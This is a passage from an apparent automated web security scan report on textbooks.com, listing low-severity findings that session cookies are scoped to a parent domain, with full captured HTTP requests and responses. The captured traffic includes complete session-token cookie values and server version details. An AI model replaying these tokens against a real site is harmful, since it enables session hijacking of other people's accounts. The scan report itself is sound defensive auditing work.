GET /ISBN/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=NSuBfBZxQLlmKeVpj2p9K6GXP2Xq3GqdlF1j29JhhP49qoDnj2VhPtF%2BzSMKT9eCs63vmDbUC14gRGlgOHW7iFnIz0nKPe4%2F28zhfUjEeIK6BU0mxbEy6a8NP6ZcHZDS0d%2BGLBJoPYFfBELmQxETjIyvr2JM1BckKpl0%2B%2BGweX4L3LRDN5hyWbPjFFZsQpfxoALTnPu69wrYw9YLAXXnWMwe5PvA0km5HWA%2BQM88x8U%2FaM68vO5NjBdmH3FR0tXFt%2F6F28h524nLS4lf8W3thACm9zITvDf9NoE17qU5XvOcrc08uQ2cku7dv5vkw0PHJpGld9fII2rcIRrLbO9cOObvvaao7XCozluY12rqImY2KgnOG36TKR8T918yXmNWsyM3AlfUA52%2FBahT0cp2ZTZqBJ0gudZ6OAXk6cPNIt%2BakJpEpqp7rJb06ioOGUX%2F1Vi5pB9JNB6fyvmXx4d6gSsxttlSjtElFEUfjQtr053LITRw%2Fb8vRkQ0VhDtfiGE9Jcij5xSVEEO0ox9LYAb%2F2xs5ZXXXRDG7ih2dMYCY59Q8bg3yKOWfSV6J0vEevFy%2BTGbXwnm8kVPW6L%2BuUyAcSDBWicdfRqSPGZ%2FDpayY%2BG2mJaKC5pg6uBJ3ZyqnE%2F4SB9F0KOBuSYIBozjljgRga2cOEwLRVzeiEn1gaaZHSm75%2Bkejm8YlEWk1rsoaCWeQzSyWkgT6CbSxr9GvZ7Kv7kAFjwY8qskCs6Ory5E4qfg45Uwz3%2BYuzWGBhD9Ux5cir%2BY5XNzM%2FeXU4T0SPQl5V7i6pIVw6m8y7uglKdwbCqgGE%2ByDp0mERMZCSrcclffc3ivX7zLrQhW9UPAvTQpdDdX4%2BQ6HF%2Ft9qMV1LK%2BWKfooVLyowzRgeBdLcKqC6ZKqQbX%2Bx2W5dlseuvChLi5UwH51Tl1%2B5QeNrbdUs%2Fb2%2FzzUAVe12METH%2Bb9HtMkeFT1j6YkC6YeYNtovu6DuRv2OxcGW1RLzACktX%2Fp98Xk4%2B5qYvnNceL8VBb0sUyDTMbclqZrXvHjROfKugoAIttOGs1mzIDvbdpm5bXNAAfXzZU2bJqbIAmibKVtX3NFe5E0f32%2B85IUuosNZ%2Bv6vO%2Br1HgpsZg%2FnRyj3L6LQ7MJb316arXbMKidws9b4f%2BDLk%2FhD5rdtYjKA8WvrDfpRnOJYFB2oPEBYC3Gz0EADTnhRY%2BD2TTQnYCXd7dPyZaiFtT5cBJs6NP5syouTWXfoYCkgP%2Fl5M2pKt00u0Wx%2B9sMSOI3gSj%2BMLyTaNj8bA%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=cqnUxW8NCiD%2BXzL8wDU%3D; expires=Mon, 26-Dec-2011 13:53:05 GMT; path=/; domain=.textbooks.com
Content-Length: 55229


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   <meta name="keyw
...[SNIP]...

3.23. http://www.textbooks.com/buy-textbooks.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /buy-textbooks.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /buy-textbooks.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:51:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=%2BXtVJGYHo3mlKCIO6uOjhqxhveDjwNpBbuHWVtbh8Gm7JgD2rX11pMKyI9%2BQFysTcmyvJS9XeGRcLRFjQeRkSDnACvzpdJiA7jxBwTixZ5rnl36UXVni%2FxgMaTE3rDzwSX8mQzQUCJxIUhieDsn3QnrqBsMcoZSZCF%2BCOJXpWeh5le7dM%2BNL5g5z%2F%2Fps5zbn8%2FnJOeEH0pZT2obBQ2kK3ETq0S2D3%2B6Rl760NIZrMwumRmQL7RSjBErU%2FHKyMLNo6FYb0Glu6LcoFpsHG4xzpBYPbAK4DN1mOGSkKEUFyxz8d8c45vlwUFbo69jfmLt%2BVzlSxrXC877DtUBSuUgrMRpI3XrqT657VIIBBsUW2zhYaC9j728B7jm2paAXwp%2BPRecf0EFU4xDpmyKWYL3W%2BU7ijPKdQI%2F0MlC2iV0rYs87eFEAMV9QSPCf9Ogy6jpnN5gtffB5EU2mXjQRVupmFKgMidJu680VRfflPt06AGmwQtuM6VtAvIe6vugo1nbIjnnfTxOfatndyOr%2Fs%2BW7I%2FzHheTTfNagKyEtHChaKKm5mk7GyBLxTbaFPYYNEO75XTdqUkpqkpvF6xunkyYn29rRa1gk3f6bFMK2w%2FIeatojhK0etUPlwEkCTqf2kHD1IUBKM7WTmICPwBFWy3ZDjUlPKShDG6gXnNuC7L24VcRZufhOkz5t%2BELd51guT5NLTgDXLuB3Yfz0InuF4wt6f7Fuj1bln6YNCKckbZnubS2oSQ74iPHbib%2FNsW7NPE4Kns1jA1wUTRE5VsECqhFYhSBLoSrf%2ByEa3Lp2%2FBf487Z1K1237xfKrjZjIQ41kYC8qoW1eOwPiEH0lmiu4W6u44KOOKCGKd7T5ZLOVflFVF7cufY35%2B058j0p9%2BH3HW1B9hHCUdCiA2AJOwO%2FaPlIJGrvesRxbQtvuaO94Z9ZJwwH8CiN9EoTbEBAlyc%2BUoYPJ0hsQYx6Gv4m30fqhctWj5nWs4HODbYXQ0ftY32RZiD%2FeTtAS87mZmPHHJy9ny%2FCK06TR7dJyOeowsJmWqd3ZKgKsnHkWnrDwfQoW8gqtPnR5c79c0XUymbZoxIrRCEDZxlYDs98Rxbszwl0prmCZHtdjZHz799IS7k7t73CdyrjrltfqyTLaA6U3h6lv1KC4DqRCGfOc8HMzm4wqx0%2Fx3%2F2nRPgPadviz6Qp4DH4CeXmmOh7OQyHlIDjM%2B64C%2FM1j0D5MQnE6M12sBIw%2BbS0N46znX2isHbdWqnuL8dgYNCJZnAJd7QdMNYe%2BQ%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=AmOCzIVFPte8ojCPQx4%3D; expires=Mon, 26-Dec-2011 13:51:57 GMT; path=/; domain=.textbooks.com
Content-Length: 61327


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.24. http://www.textbooks.com/etextbooks.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /etextbooks.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /etextbooks.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=Pbk2zJyA8AE3TFrTqb2spaGwWBp5fz8HvEQD88AlWpwL760JR1jSFrZnXeH4WrLwIDiWmNrqfND9qJspcMZT4Kpj1Y7fHKHkf%2BHnIAjFDoFOZkuevMg9KXcgpFZaPB79Bv%2FMmDw31nJJ4wpzfW9y3t1XykAB9NVBARjIbg%2F2%2BdCQO%2FtL60u7%2FW51ZKwfLpMJVuxvqZi8UPWkkWdQh0E7ljYzAa1pW7%2Bu6B4eIdO1Ys33T2YRyapxvsDcanPAsMXkVDJFj2R9XQ5%2FZZ8UOzBkS8nWw9UEqcUjEDC2PuFlRoEjA09UcABoUb0eHErfvmOsosLDdq7Ro5YLXw955cnUadphO8mzRY2exRZe%2BZkOXQobYPzMc6HYKioy2wI9RyIyS6%2BNuBMOxIxwoC8rqStJJ8pTYfZQfuAa1JQQQruc9fG%2B2dFIU%2B2SLrXwsw1KfAP4r15ynWkXmh%2BMmhZ9sApr08IeV7AeG0ZFhR6PSNqLzUrwJHJlexJUiXFmKs38Z1Kg9h8eEHrZ1Wm8to8wqN1%2Fcc7x8x8n3ANy%2B7MOLbGElcCRhzQCw8Bg%2FwhodX8iZPPopZ5eeDz%2BZ3MKpwDSLOfx%2FKNcykivltXCVYSnk3lpgn7zbUI9p3QCLM8NkfNDpxaF%2B8ghgPaUyFsFnsd3Z0Vjg1NHay2se3%2BGgB9DdCLq3xL4%2F0zf2ceHWHflLhndU9G%2FA14jzNozTWVtwocyZKBmmkNT0ZLhv9R9EltOqH4wTJZBCMjMXlOt%2BDAMkfM%2BvQvUzF12sR7HRc6157s07zyouCOzVSnXCGTeKQH6TcJ6DGrODApiAyvA5Hk6he6y1qV2KqjPWwYufG80oa%2BbJ9avXFRU0xgpuYnX3L%2BzjmU6oiUEwZA745IyWLTIGGUht%2Fub0Sg48hoCRt5395zXpp7dKZAjvruKpXnJ7ErwccTX8YtADj9ZixHHwnQF0kL8v6E8RwYJhyGAd%2BxbhBJC3XH7gsc11jRw8iYqYDVA8xKHQxVYGaL6Vr43iJ6cHPkMxsDtzbmR%2BarJs1OanYNc2PVYoAZvrdfAQBm3VppTVNcpBJ4ATbUNHZUwwAwz2oyLd7yHQYOwCSVjbz4eDM43SyEjUgmRXtpf1ol0PBXvCNA3%2F9g89AxIk2pADswI8SHbm3IqiYblTfJy0luOrTbdNfqsdw5b7NJab8DP%2BC0uILbc6VRmnmcL6iT42bd3Hi7llP1l1Lal7AvNMdnVbebi4c%2FZ2HlALQTyIaZt7N%2BGH%2BZIFve1iZOablhb3oDCnxY%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=j%2B55cxm1jR4qZ2uZPCY%3D; expires=Mon, 26-Dec-2011 13:53:06 GMT; path=/; domain=.textbooks.com
Content-Length: 49082


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.25. http://www.textbooks.com/rent-textbooks.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /rent-textbooks.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rent-textbooks.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:51:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=r8wgw2O3LRvekHnnSCinxzMGvHch1ZumiUZuZ%2FyCQO8FR7%2Bj2lwFw%2BaEgnFb0FVASMV62J29dLbD3ERoy%2FqQ0TmEINT4kI3WrPXh9%2FL%2FlHjpIlZMGrTmS8gaVO1NCuWiC8JzPYv7hXujuH57rDAeiIarCGifKvBFGamTFNiaJXZ6hTs1TbRdTv4c7NG%2BJNIO299OLfsRFMyqB2b7TLgyYWjU1pxnyfDFvogj3j6FjoEEGnQjebI%2BSnXXO8QfyHC2MIqXvctl0qm2dxYU5bxsCJYsWiEYZKK%2FEcZcD9fqDlnekZPV%2FtvipiJhnkDjbq5Gq1dyMhMt6v6mJLDbvtocozMG4hrfj9ljfrUk4YgL4OKLHoBvcVLq9qk0X10I9fgAgneCqFCl08kFJisbeXAqd8%2FvgbsGvdwR48%2BVc3aOg1YxXQh0KDFlyhLSbV2CovOOLI2Zqoln%2FWfqvd%2FbpPgynWR%2BiYw8r8iXPyRu0Y2YjsxZ61oYybwoTlR2%2BLwiZKS%2B8YS%2Bdef4nl%2FTKeuqHMlQlycqoSH11aUhmACBFvQZBT5QuWKg4uC4IrcjwT3THq%2BAOLcNe2JDR3teW53EY9HVNMpM3PxyKloEG%2BI278WPRTJRS7PcEokchzPLsV6P9iVRE8pzhWJ07Yt40TJ0tbkxgOLJ3Rnl9u%2FUdtvLI0IJaDle2WUoNyYZWThghEHElv5ed7T8lCS9JWXhB5SedvWEGuzZZzLoHhum6wup4fnEdM7kvp7e9lbpMepQYzMXwb244Ey9YYhJiASnXk%2BS0kwSXJrDSj4Nv8rQQr16MWkmfSIcjzpjL1CjrginwZMsTumgzpxdiZYBq5wAE2b4cLPZpYiC79%2Bu6wP%2FeA2kyVMp4szfNJSU%2BdmlUDkMlmcZRoFr2RB%2FirehTIbzbQIx63ZEcd5H9f7qci6%2BaSZdMtC%2FqeyfJPuhX%2B7IVup3xo%2BE6PUemTJbna%2FTFbny3TjgF5qvC8%2Bidb0rEZpsOVk%2B0t1v6XQzM2TcZZkMMWYdKAPm0uwc1AXbiFgYyt6fPq94QFlszqdKbiZDgEhQSDCS3yj8%2FMpEJ9oPwuGNB2iVjLcoy1rZ8dUdotmAEKdKaAbdkZaGzxlsXQ3IktqqbUCP0IQ6oTKgOyBEBLu5xQkMnPVk2wkHK8Xby70hJqvibpCPowktXUetw0J3ZDx79NJv3SdJ3PYP7TZc6VLsIFf%2FyC4%2FXE5i7kiukEbLsC%2FHrjQz3dKX4qTBre7X8Jq8SfdwecfeCg30NiLMfxeh4kulrs8%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=jmetkS3kpyLzouadTgQ%3D; expires=Mon, 26-Dec-2011 13:51:58 GMT; path=/; domain=.textbooks.com
Content-Length: 38984


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.26. http://www.textbooks.com/sell-textbooks.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /sell-textbooks.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sell-textbooks.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIh